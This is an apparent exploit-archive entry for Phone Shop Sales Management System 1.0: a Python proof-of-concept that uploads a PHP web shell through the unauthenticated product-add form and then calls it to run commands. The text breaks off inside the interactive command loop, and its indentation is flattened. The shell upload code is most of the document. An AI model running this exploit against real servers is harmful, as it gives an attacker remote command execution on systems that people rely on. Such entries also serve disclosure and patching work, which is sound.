Authored by Richard Jones

Phone Shop Sales Management System version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)
# Date: 20/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

import requests
import sys

IP="127.0.0.1" # CHANGE ME

ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php"
CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"
s = requests.Session()

def postShell():

data = {
"ProductName":"1",
"BrandName":"1",
"ProductPrice":1,
"Quantity":"1",
"TotalPrice":1,
"DisplaySize":"1",
"OperatingSystem":"1",
"Processor":"1",
"InternalMemory":"1",
"RAM":"1",
"CameraDescription":"1",
"BatteryLife":"1",
"Weight":"1",
"Model":"1",
"Dimension":"1",
"date2":"1",
"Description":"1",
"_wysihtml5_mode":"1",
}


fileData = {
'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")}

r = s.post(ADDURL, files=fileData, data=data)

if "The product is successfully added" in r.text:
return True
else:
return False

def runWebShell():
try:
while True:
cmd=input("